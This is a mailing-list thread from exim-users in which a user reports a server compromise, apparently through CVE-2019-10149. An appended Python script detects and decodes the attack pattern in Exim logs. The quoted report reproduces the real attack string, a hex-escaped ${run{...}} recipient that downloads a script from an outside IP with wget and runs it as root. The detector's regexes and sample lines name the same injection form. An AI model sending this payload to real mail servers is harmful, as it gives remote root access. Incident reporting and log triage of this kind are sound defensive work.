Re: [exim] just been hacked, could be CVE-2019-10149?

Author: Odhiambo Washington
Date:  
To: Calum Mackay
CC: exim users
Subject: Re: [exim] just been hacked, could be CVE-2019-10149?
On Tue, 11 Jun 2019 at 03:19, Calum Mackay via Exim-users <
exim-users@???> wrote:

> hi all,
>
> My mail system has just been hacked; it's running Debian unstable exim
> 4.91-9
>
> Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
>
> The reasons I suspect exim involvement:
>
> • starting today, every 5 mins getting frozen messages:
>
> The following address(es) have yet to be delivered:
>
>
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
>
> Too many "Received" headers - suspected mail loop
>
> • the trojan horse scripts, that were successfully installed on my
> system, with root access, are all group Debian-exim
>
>
> Luckily, it looks like the trojans did nothing more than repeated
> attempts to open up my ssh server to root logins, which I think (and
> hope) didn't actually work, so I may have been lucky, and the damage
> isn't widespread.
>
>
> ought I to be reporting this anywhere?
>


Whom would you like to report to?? :-)
All vulnerable versions of Exim had a patch released several days ago.
We hope you either applied the patch, or updated to 4.92. If you did none
of those, you are on your own, my fren!


--
Best regards,
Odhiambo WASHINGTON,
Nairobi, KE
+254 7 3200 0004/+254 7 2274 3223
"Oh, the cruft.", grep ^[^#] :-)
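Added triage example, not from the original post or from the Exim project: it scans constructed Exim main-log lines for the indicator Calum describes, a recipient local part carrying a `${run{...}}` expansion item, and decodes the `\xNN` escapes so an analyst can read what the expansion would have executed. The message ids, domain and commands in the sample are made up.

```python
import re

# Constructed sample of Exim main-log lines (not from the original post):
# a deferred delivery whose recipient local part carries a ${run{...}}
# expansion, a normal delivery, and a frozen message. The message ids,
# domain and commands are made up; only the pattern follows the thread.
SAMPLE_LOG = [
    r"2019-06-11 03:00:01 1hZx01-0001AB-CD == root+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22id\x22}}@example.org R=dnslookup T=remote_smtp defer (-1)",
    r"2019-06-11 03:05:01 1hZx02-0002AB-CD => alice@example.org R=dnslookup T=remote_smtp H=mx.example.org",
    r'2019-06-11 03:10:01 1hZx03-0003AB-CD ** root+${run{\x2fusr\x2fbin\x2fid\x20\x26}}@example.org: Too many "Received" headers - suspected mail loop',
]

# Exim message id, e.g. 1hZx01-0001AB-CD (three base-62 groups).
MSG_ID = re.compile(r"\b([0-9A-Za-z]{6}-[0-9A-Za-z]{6}-[0-9A-Za-z]{2})\b")
# A recipient whose local part contains a ${run{...}} expansion item. The
# payload itself carries no braces (they are \x-escaped), so [^{}]* suffices.
RUN_RECIPIENT = re.compile(r"(\S*\$\{run\{[^{}]*\}\}\S*)@([A-Za-z0-9.-]+)")
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def decode_escapes(text):
    """Turn Exim's \\xNN string escapes back into readable characters."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def extract_run_command(local_part):
    """Return the decoded argument of the ${run{...}} item, or None."""
    m = re.search(r"\$\{run\{([^{}]*)\}\}", local_part)
    return decode_escapes(m.group(1)) if m else None


def triage(lines):
    """Report every log line whose recipient local part carries ${run{...}}."""
    hits = []
    for line in lines:
        m = RUN_RECIPIENT.search(line)
        if not m:
            continue
        msg_id = MSG_ID.search(line)
        hits.append({
            "message_id": msg_id.group(1) if msg_id else None,
            "domain": m.group(2),
            "command": extract_run_command(m.group(1)),
        })
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

Run it over `/var/log/exim4/mainlog` (or `exim -bp` output) to list affected message ids for removal from the queue; a hit is only an indicator, and a host that shows one should be treated as compromised until the 4.92 upgrade and a forensic review are done.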